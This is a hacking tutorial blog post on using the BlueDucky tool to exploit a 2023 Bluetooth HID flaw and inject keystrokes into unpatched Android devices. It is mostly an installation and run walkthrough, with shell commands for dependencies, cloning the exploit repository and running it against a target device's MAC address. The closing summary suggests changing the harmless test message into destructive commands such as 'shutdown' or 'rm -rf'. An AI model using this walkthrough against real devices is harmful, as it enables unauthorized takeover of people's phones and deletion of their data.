Bluetooth Hacking: Injecting Commands into a Bluetooth Device with BlueDucky

Uncategorized

Welcome back, my aspiring cyberwarriors!

Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity or a piconet, such as speakers, headphones, and cellphones. If an attacker can exploit Bluetooth, it may be able to take control of or eavesdrop on any of these devices.

There are numerous classes of Bluetooth devices. These different classes are announced to the connecting device in the banner. In previous Bluetooth tutorials here, we have discussed probably the most important class for exploiting Bluetooth devices, the HID class. This class of devices are known as Human Interface Devices and include such things as Bluetooth mice and keyboards. These are the devices that are allowed to send inputs to the Bluetooth-enabled device necessary for keyboards and mice to function properly.

 

In 2023, a new vulnerability was discovered in Bluetooth that may allow an unauthenticated HID Device to initiate and establish an encrypted connection. If this happens, the HID device may be able to inject commands into the device. This exploit works against unpatched Android 11 and later devices and any Android 10 and earlier device, as there is no patch presently available for these devices. A Proof Of Concept or POC was released in January 2024 and was recently integrated into a new tool known as BlueDucky.

 

Let’s take a look at this tool and see what it can do.

 

 

Step # 1 Download and Install BlueDucky

 

To install BlueDucky, we need to do a few things to get our system ready.

 

First, update your apt cache.

 

kali > sudo apt update

 

Next, install the necessary dependencies from the Kali repository.

 

kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus

 

We n0w need to get bluez from github.com. If you have done my previous tutorials on bluetooth, you likely already have this.

 

kali >  git clone https://github.com/pybluez/pybluez.git

 

Now, move into the new directory, pybluez.

 

kali > cd pybluez

 

We now need to run the setup script for bluez

 

kali > python3 setup.py install

 

Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.

 

kali > cd ~

 

kali > git clone –depth=1 https://github.com/bluez/bluez.git

 

kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth

 

Now, let copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it in our script from anywhere (/usr/local/bin is in the Linux $PATH variable).

 

kali > sudo cp bdaddr /usr/local/bin

 

Finally, we should download BlueDucky from github.

 

kali > git clone https://github.com/pentestfunctions/BlueDucky.git

 

kali > cd BlueDucky

 

kali > sudo hciconfig hci0 up

 

Step # 2 Run BlueDucky

 

Now that we have all of the elements necessary to run BlueDucky installed, let’s try running it. If you are running it from a system with an external plug-in bluetooth adapter as I am, you will likely need to make a small change to the python script. BlueDucky, by default, uses hci0 to scan for Bluetooth devices. If you added an external bluetooth device, it will likely be recognized as hci1. We can remedy this by simply opening the script in your favorite text editor and changing the default value to hci1. Here I have used the default GUI text editor in Kali, mousepad.

 

kali > sudo mousepad BlueDucky.py

Now, go ahead and save this file. Make certain to give yourself execute permissions.

 

kali > sudo chmod 755 BlueDucky.py

 

It’s a good idea now to check to make certain your bluetooth adapter is up and activated.

 

kali > hciconfig hci1 up

 

If your adapter is up and running, it’s time to start BlueDucky!

 

kali > sudo python3 BlueDucky.py

If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.

At this point, you can select “yes”and enter the MAC address of the target device.

When you do so, BlueDucky will run through the requisite commands to compromise the device and if successful, will inject a “hello there 123” to the target device.

Summary

Bluetooth enabled devices are all around us in our everyday life. These includes phones, tablets, speakers, headsets, keyboards and many other devices. Bluetooth devices declare the type of the device they are before pairing with another device. This is the class of the device. This class declaration can be manipulated by an attacker to inject commands into the device.

BlueDucky is an automated tool for exploiting this vulnerability and although the tool only sends an innocuous message to the target, it can easily be altered to send malicious commands into the target device such as “shutdown” or “rm -rf”.